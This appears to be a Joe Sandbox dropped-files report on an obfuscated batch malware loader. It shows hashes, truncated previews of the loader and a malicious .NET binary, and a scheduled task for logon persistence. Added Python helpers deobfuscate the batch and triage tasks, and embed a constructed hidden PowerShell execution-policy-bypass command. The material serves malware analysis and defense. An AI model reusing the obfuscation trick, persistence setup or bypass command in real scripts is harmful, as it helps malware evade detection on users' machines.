                                                Preview:p...... .........w.heM..(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):9713
                                                Entropy (8bit):4.940954773740904
                                                Encrypted:false
                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                Malicious:false
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2892
                                                Entropy (8bit):5.437969087793142
                                                Encrypted:false
                                                SSDEEP:48:oizsSU4y4RQmFoUeCamfm9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKL2O9qrh7KWBJ5Eo9Adrxk
                                                MD5:3D05665264FF5F9612A974D7E6FAF75D
                                                SHA1:EFAF5F2EB18DE5070947DE4B2B58F6F8ADF8C00E
                                                SHA-256:F807ED1F52729FE3DDB61E208FCEA8278FA7A7D6358C21055BC640E53E09A12A
                                                SHA-512:F2E2CB6A0248D6186B4EF1FDEFD532D82A663AE3494D6716A80B8134D7B6AEC542D12CD2282F038C6CE33C84E838880CE85927FADB868B46C275D2D806AB18CA
                                                Malicious:false
                                                Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:DOS batch file, ASCII text, with very long lines (3583), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):7309406
                                                Entropy (8bit):6.016969361705345
                                                Encrypted:false
                                                SSDEEP:49152:RjtZxa9XGka7V+vlw0ELOZA1NEITyfi7SlSjncYHEJ9MFrbwjMxGQMH+INp1YHpy:Y
                                                MD5:F3454E2CB275019527E248CB08111111
                                                SHA1:4180893CCA4DCE02E0BBEAB52B5A099201DB5FFB
                                                SHA-256:0999322E8A2A984B5400544B31A91AE8DD49B362A2517FE497A8E1455DE07D8F
                                                SHA-512:489A89AB9D9A1423CCD18931F74707851D4E3ADD00306F7BDCCCE511DE308D1FABC14CB734925D78609FD522402E9ABEA1106B1765D5C90A27C32A2A5889C7CC
                                                Malicious:false
                                                Preview:@echo off..%hHWGUYBuKQfdXizhnralBipksPqZjjVATDyHbfvAfWacuRgvQmYUuhvZsMoeH%@%lAUEjtJSghWAfEhmPAJUiWlbgMizpoQrTDLAiPHM%%YgQYUbQRgXOuMtooTyxlkCRrEGCTGdaSWikQvdlKrHjrcWgkwl%e%qkBBvoztnzWkcWVxDixTPnMTC%%AoIzswvOJIvGPCVKXluwgugyDbZrzd%c%IZbOkLOgAPnnncXtVYfpAyfmfijWqxdpGkN%%NNLYjeUHThTwFIdttNXjTPJcBRQcMXGcppFimgfvDytXo%h%qIuJWSnDOYeIxsoRUVAQhqcVgmIBFuvLNOAhIcbOPLBHdDJNhMD%%wxFaGzCKkLXtCsVIRhjSTMbvOuRCCUuTQXo%o%iABjzrEdNifLIbVZCLEKwkllHZ%%preCFeFzrFZtChXHGp% %UBYuqfsDTYppBzjo%%JGAGdBEtDsbDzCEWBfGrXNwmALBcqxTtTlXaPzQZtaNNratvKs%o%tCXOWjngra%%dfyIJoFDhcpGXXZIVzsfrXxARVwbRBtyZRWHpJqe%f%glXdVaRWAsGZUlfHXQOSDMGJRHfastmjnpkMAwVUEeqiMyfGRZrSCm%%tFomoUREhgwLEathBVTnzw%f%WsCzjsbtHbdRhljHaNzibpNAFxSQWIYMXh%..%ULvImfMPKBjmWrnTAZnvGEcTLAlwY%s%qTZTpWEfncpA%%ZwlVyJOyNJMLp%e%BXMUqQHkpmcbrovLkggBcwzENNkEDjnhamdhBiYJvOhYTwr%%cbyFFNGexigCGcHfZUbelnkbhxgopALqwKBBK%t%CnGZKtcwcshbYYumoPQxyiGsOXxPfWBfussOymDRZKuNg%%BMVjvMKnitGnkNWmqgRbHGFG%l%cmZxNOTlBvKUVAOvgjYilcPVNuoWfGVgpwtALQvFMbJslruFcGA%%GyCawdJtAWgUzDEzhoJqO
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):36864
                                                Entropy (8bit):4.3900594222407125
                                                Encrypted:false
                                                SSDEEP:384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
                                                MD5:B943A57BDF1BBD9C33AB0D33FF885983
                                                SHA1:1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
                                                SHA-256:878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
                                                SHA-512:CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Joe Sandbox View:
• Filename: Hydra.ccLoader.bat, Detection: malicious
• Filename: NhoqAfkhHL.bat, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G.*.I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.|/..J3....?.vMl.-.P...)...RZ..-....|.0.x.....D.....>...G...C..e.....IZem...s....|.l~.c........<d.*..y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................
                                                Process:C:\Windows\System32\cmd.exe
                                                File Type:DOS batch file, ASCII text, with very long lines (3583), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):7309406
                                                Entropy (8bit):6.016969361705345
                                                Encrypted:false
                                                SSDEEP:49152:RjtZxa9XGka7V+vlw0ELOZA1NEITyfi7SlSjncYHEJ9MFrbwjMxGQMH+INp1YHpy:Y
                                                MD5:F3454E2CB275019527E248CB08111111
                                                SHA1:4180893CCA4DCE02E0BBEAB52B5A099201DB5FFB
                                                SHA-256:0999322E8A2A984B5400544B31A91AE8DD49B362A2517FE497A8E1455DE07D8F
                                                SHA-512:489A89AB9D9A1423CCD18931F74707851D4E3ADD00306F7BDCCCE511DE308D1FABC14CB734925D78609FD522402E9ABEA1106B1765D5C90A27C32A2A5889C7CC
                                                Malicious:true
                                                Preview:@echo off..%hHWGUYBuKQfdXizhnralBipksPqZjjVATDyHbfvAfWacuRgvQmYUuhvZsMoeH%@%lAUEjtJSghWAfEhmPAJUiWlbgMizpoQrTDLAiPHM%%YgQYUbQRgXOuMtooTyxlkCRrEGCTGdaSWikQvdlKrHjrcWgkwl%e%qkBBvoztnzWkcWVxDixTPnMTC%%AoIzswvOJIvGPCVKXluwgugyDbZrzd%c%IZbOkLOgAPnnncXtVYfpAyfmfijWqxdpGkN%%NNLYjeUHThTwFIdttNXjTPJcBRQcMXGcppFimgfvDytXo%h%qIuJWSnDOYeIxsoRUVAQhqcVgmIBFuvLNOAhIcbOPLBHdDJNhMD%%wxFaGzCKkLXtCsVIRhjSTMbvOuRCCUuTQXo%o%iABjzrEdNifLIbVZCLEKwkllHZ%%preCFeFzrFZtChXHGp% %UBYuqfsDTYppBzjo%%JGAGdBEtDsbDzCEWBfGrXNwmALBcqxTtTlXaPzQZtaNNratvKs%o%tCXOWjngra%%dfyIJoFDhcpGXXZIVzsfrXxARVwbRBtyZRWHpJqe%f%glXdVaRWAsGZUlfHXQOSDMGJRHfastmjnpkMAwVUEeqiMyfGRZrSCm%%tFomoUREhgwLEathBVTnzw%f%WsCzjsbtHbdRhljHaNzibpNAFxSQWIYMXh%..%ULvImfMPKBjmWrnTAZnvGEcTLAlwY%s%qTZTpWEfncpA%%ZwlVyJOyNJMLp%e%BXMUqQHkpmcbrovLkggBcwzENNkEDjnhamdhBiYJvOhYTwr%%cbyFFNGexigCGcHfZUbelnkbhxgopALqwKBBK%t%CnGZKtcwcshbYYumoPQxyiGsOXxPfWBfussOymDRZKuNg%%BMVjvMKnitGnkNWmqgRbHGFG%l%cmZxNOTlBvKUVAOvgjYilcPVNuoWfGVgpwtALQvFMbJslruFcGA%%GyCawdJtAWgUzDEzhoJqO
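The preview above (the same script as the earlier powershell.exe drop, re-copied by cmd.exe) shows the obfuscation at work: every `%NAME%` token names an environment variable that does not exist, and when cmd.exe runs a .bat file it expands an undefined variable to an empty string, so only the characters between the tokens survive (`@echo off`, then `setl...`). The following helper is an added example, not part of the Joe Sandbox report or of the sample; it reproduces that expansion rule and tracks plain `set` assignments so later references to variables the script does define still resolve. The junk variable names and the `SAMPLE` script are constructed in the style of the preview and are not taken from the real file.

```python
import re

# `set name=value` / `set "name=value"` after expansion; `set /a`, `set /p` and
# delayed expansion (`!name!`) are not modelled by this simple line-by-line pass.
SET_RE = re.compile(r'^\s*@?set\s+"?([^=/"][^=]*?)=(.*?)"?\s*$', re.IGNORECASE)


def expand_line(line, env):
    """Expand %NAME% references the way cmd.exe does inside a .bat file."""
    out, i, n = [], 0, len(line)
    while i < n:
        if line[i] != '%':
            out.append(line[i])
            i += 1
            continue
        if line[i + 1:i + 2] == '%':            # '%%' -> a literal '%'
            out.append('%')
            i += 2
            continue
        j = line.find('%', i + 1)
        if j == -1:                              # unterminated '%' is dropped in batch mode
            i += 1
            continue
        name = line[i + 1:j]
        if ':' in name:                          # %VAR:~a,b% / %VAR:x=y%: left for the analyst
            out.append(line[i:j + 1])
        elif name.lower() in env:                # defined: substitute (names are case-insensitive)
            out.append(env[name.lower()])
        # undefined: expands to nothing, which is the whole trick in the sample
        i = j + 1
    return ''.join(out)


def deobfuscate(script, env=None):
    """Expand every line, learn `set` assignments as they appear, drop empty lines."""
    env = {k.lower(): v for k, v in (env or {}).items()}
    cleaned = []
    for raw in script.splitlines():
        line = expand_line(raw, env)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).strip().lower()] = m.group(2)
        if line.strip():
            cleaned.append(line)
    return cleaned


# Constructed input (not the sample's real content): spells "@echo off" twice, defines
# ps=powershell through junk tokens, then invokes it via the defined variable.
SAMPLE = (
    '@echo off\r\n'
    '%AbCdEf%@%Ghij%%Klmn%e%Op%c%Qrst%h%Uv%o%Wx% %Yz%o%Aa%f%Bb%f\r\n'
    '%Cc%s%Dd%e%Ee%t%Ff% "%Gg%p%Hh%s=%Ii%p%Jj%o%Kk%w%Ll%e%Mm%r%Nn%s%Oo%h%Pp%e%Qq%l%Rr%l"\r\n'
    '%Ss%%ps%%Tt% -%Uu%e%Vv%p %Ww%b%Xx%y%Yy%p%Zz%a%Ab%s%Cd%s -%Ef%w%Gh% hidden\r\n'
)

if __name__ == '__main__':
    print('\n'.join(deobfuscate(SAMPLE)))
```

To run it over the real drop, read the 7 MB file as text (`open(path, encoding='latin-1').read()`) and feed it to `deobfuscate`; because the preview is truncated, nothing here asserts what the real script does after `setl`. The helper deliberately keeps `%VAR:~a,b%` substring tokens and does not follow delayed expansion, so those parts of a script still need a look by hand.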
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):3494
                                                Entropy (8bit):3.5831244567466025
                                                Encrypted:false
                                                SSDEEP:96:tpndEnkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:zUkYx39OhO6jy++
                                                MD5:1AEDAA154572FE5FA7B54B46201EA461
                                                SHA1:7997B0C3E59B5279980C562D8E49D72958EAA1C3
                                                SHA-256:FD2D61CFEAF1A26584E87DAD98D3B1E0C549F31CF5FC52756DC70ECBBF83CC50
                                                SHA-512:B9F907A00346F2FE609B39023854C6779154F70B46FDB15DCEC82E3D6322256EDB8C6CE056C1B4644A075B935B9F0C18EFE26BA17984E4614F1B8129F224F476
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.1.3.T.0.8.:.5.1.:.2.6...8.6.8.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.m.W.4.1.W.e.M.4.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
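The task definition above (UTF-16 text, so every character is followed by a `.` in the preview) registers a task named `\$nya-mW41WeM4` with a `LogonTrigger`, `RunLevel` `HighestAvailable` and the `builtin\Users` group as principal, which together mean "run this, as elevated as possible, for whoever logs on". The preview cuts off before the `<Actions>` element. The following triage helper is an added example, not part of the report; it reads a task file the way Windows stores it under `C:\Windows\System32\Tasks` (UTF-16LE with BOM) and reports those traits. Both embedded task documents are constructed: the suspicious one reuses the fields visible above, and its `<Actions>` (a powershell.exe command with a `C:\Users\Public\stage.ps1` argument) is an assumption, as is the sc.exe action in the benign `SvcRestartTask` lookalike.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {'t': 'http://schemas.microsoft.com/windows/2004/02/mit/task'}
USER_WRITABLE = ('\\users\\', '\\appdata\\', '\\temp\\', '\\programdata\\', '\\public\\')
SCRIPT_HOSTS = ('powershell', 'pwsh', 'cmd', 'wscript', 'cscript', 'mshta',
                'rundll32', 'regsvr32', 'msiexec')
_XML_DECL = re.compile(r'^\s*<\?xml[^>]*\?>')


def load_task(data):
    """Parse a task file from bytes (UTF-16 with BOM as Windows writes it, or UTF-8) or str."""
    if isinstance(data, bytes):
        utf16 = data.startswith((b'\xff\xfe', b'\xfe\xff'))
        data = data.decode('utf-16' if utf16 else 'utf-8')
    # the declaration still says UTF-16 but we now hold text, so drop it before parsing
    return ET.fromstring(_XML_DECL.sub('', data, count=1))


def triage_task(data):
    """Return the fields a responder looks at first plus a list of reasons to look closer."""
    root = load_task(data)

    def text(path):
        return root.findtext(path, default='', namespaces=TASK_NS).strip()

    uri = text('t:RegistrationInfo/t:URI')
    trig = root.find('t:Triggers', TASK_NS)
    triggers = [] if trig is None else [el.tag.split('}')[-1] for el in trig]
    run_level = text('t:Principals/t:Principal/t:RunLevel')
    group = text('t:Principals/t:Principal/t:GroupId')
    principal = group or text('t:Principals/t:Principal/t:UserId')
    command = text('t:Actions/t:Exec/t:Command')
    arguments = text('t:Actions/t:Exec/t:Arguments')

    flags = []
    if not uri.lower().startswith('\\microsoft\\'):
        flags.append(f'task URI outside the \\Microsoft\\ tree: {uri}')
    if any(t in ('LogonTrigger', 'BootTrigger') for t in triggers):
        flags.append('persists across logon/boot: ' + ', '.join(triggers))
    if run_level == 'HighestAvailable' and group:
        flags.append(f'HighestAvailable for group principal {group}: elevates whoever logs on')
    cmdline = f'{command} {arguments}'.lower()
    if any(p in cmdline for p in USER_WRITABLE):
        flags.append(f'command line touches a user-writable path: {command} {arguments}')
    exe = command.lower().rsplit('\\', 1)[-1].removesuffix('.exe')
    if exe in SCRIPT_HOSTS:
        flags.append(f'action is a script host / LOLBin: {command}')
    return {'uri': uri, 'triggers': triggers, 'run_level': run_level,
            'principal': principal, 'command': command, 'arguments': arguments,
            'flags': flags}


# Constructed from the fields visible in the preview; the <Actions> block is assumed.
SUSPICIOUS_TASK = b'\xff\xfe' + '''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2024-12-13T08:51:26.868-05:00</Date>
    <URI>\\$nya-mW41WeM4</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
      <GroupId>builtin\\Users</GroupId>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
      <Arguments>-ep bypass -w hidden -File C:\\Users\\Public\\stage.ps1</Arguments>
    </Exec>
  </Actions>
</Task>
'''.encode('utf-16-le')

# Constructed stand-in for a built-in task (only the URI is taken from the report).
BENIGN_TASK = '''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>
  </RegistrationInfo>
  <Triggers />
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>%SystemRoot%\\system32\\sc.exe</Command>
      <Arguments>start sppsvc</Arguments>
    </Exec>
  </Actions>
</Task>
'''

if __name__ == '__main__':
    for doc in (SUSPICIOUS_TASK, BENIGN_TASK):
        r = triage_task(doc)
        print(r['uri'], r['flags'] or 'no flags')
```

Point it at every file under `C:\Windows\System32\Tasks` on a suspect host (`triage_task(open(p, 'rb').read())`) and sort by flag count; a task living outside `\Microsoft\` that fires at logon, asks for `HighestAvailable` on a group, and launches a script host from a user-writable path is the pattern this sample's `schtasks.exe` use produces. The heuristics are deliberately simple so they are easy to tune; legitimate third-party updaters will trip one or two of them, rarely all five.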
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4680
                                                Entropy (8bit):3.7107512989834324
                                                Encrypted:false
                                                SSDEEP:96:pYMguQII4ia6h4aGdinipV9ll7UY5HAmzQ+:9A4K/xne7HO+
                                                MD5:6FA3F01E12DBB14B7D4E2E143346D0AE
                                                SHA1:1870528ED0891D6E7D8397ECC095AD99934D6640
                                                SHA-256:6F04F9717F6199BDE17B98B982805EB34DB274B13F81376BD1F757963436ABF5
                                                SHA-512:624C29E2D721A8BBDC30D30B46EF3D585C65D32DCD6AEC5EAE08A9E2F8EFC1A447C32B6C170E30730B0E685FE6C44131E955783A5BF6655FC23B892FCDD824A8
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):338
                                                Entropy (8bit):3.974654678850856
                                                Encrypted:false
                                                SSDEEP:6:kKZHvg9dgn8JFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Rvgng3kPlE99SCQl2DUevat
                                                MD5:B7300F3E3E8A2D8ADE4F0F1DE88BA69F
                                                SHA1:CA19A1DBA7E470D5B076D73C352C55BEFD7E0EB4
                                                SHA-256:9A47036AE0A84B509D85A617EB666D77C38F6EF5535AD077C010BA66B558387D
                                                SHA-512:847EAB70357F3BB1F8C2DE216534D92FDE1A04C9692EA752DE540A192BC7A8FFD83C61EC7EC04EEDC6C0A9FECB0C419D07707B7862B2DFA7E9F0F7DFBEA702F8
                                                Malicious:false
                                                Preview:p...... ............Z...(...............`._.ZM..`b...M..`..G.M..........`b...M.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):74512
                                                Entropy (8bit):4.035832365719781
                                                Encrypted:false
                                                SSDEEP:768:Jnfmf+nfmfKgac4bIAbP5AAKP5qf5AKP5dfvoXfSPfm4fGfuszpfn8ynfmfF:3cWHbPNKPTKP3GbzF89
                                                MD5:0DECA055FE2A6121E7C0211467711C3D
                                                SHA1:797CB44D3F93774965854C1B7675E35D25CB0A73
                                                SHA-256:AAF9FBE3C5AA039CFC5BF196288D11F2A568FC3385E5C2AFAD2666CBD3E6FE5B
                                                SHA-512:06B13139DA590BC408D5C89B0D5D7B717361BA7DC22072A3D8486E3D4E9DB5F1EA4C31887073A99732075C13EF28BB8A67608207F68B71B8620886DAE247D6D3
                                                Malicious:false
